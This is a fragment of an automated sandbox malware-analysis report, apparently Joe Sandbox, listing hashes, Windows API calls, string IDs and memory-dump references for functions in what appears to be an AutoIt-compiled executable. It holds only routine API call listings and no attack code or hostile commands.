                                                                                                                                                                                                                                                                                        • Instruction ID: 7eb32b7e492b0564d701e91cc46053b449c3ef8dcd0d214020129a8c234e8b6e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c5e0150e4ca59feb96b241d7b01aee8d68413928e5ff92b2d452272f864c4bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB319071510604AAEB24DF74CC80FFB77A9FF58760F108619FAA587190DA75AC82EB60
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F950BD
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F950D2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: '
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                        • Opcode ID: 913d0977195aba6c617d2d347683dbb6391b11dc20f1f1f2ba5d75accf662b7a
                                                                                                                                                                                                                                                                                        • Instruction ID: 1a1c959588a2f9fff50cb813b2e8f6c501d9ba4bca9cc3ae1a44304ce2bf0f68
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 913d0977195aba6c617d2d347683dbb6391b11dc20f1f1f2ba5d75accf662b7a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F314875A0160A9FEF05CFA9C880BDE7BB5FF49700F10406AE904AB3A1D771A945DF90
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F93D18
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F93D23
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: Combobox
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F94216
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00F94230
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7D7C2
                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F7D7EB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00F6761D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F67629
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F62699
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F62593
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F62615
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F62720
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F6146F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F210E2,?,?,?,00F0100A), ref: 00F1FAD9
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F210E6
                                                                                                                                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F210F5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F210F0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F739F0
                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F73A05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                        • String ID: aut
                                                                                                                                                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F92E08
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00F92E0F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F92DC8
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F92DDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F3C213
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F3C221
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3C27C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0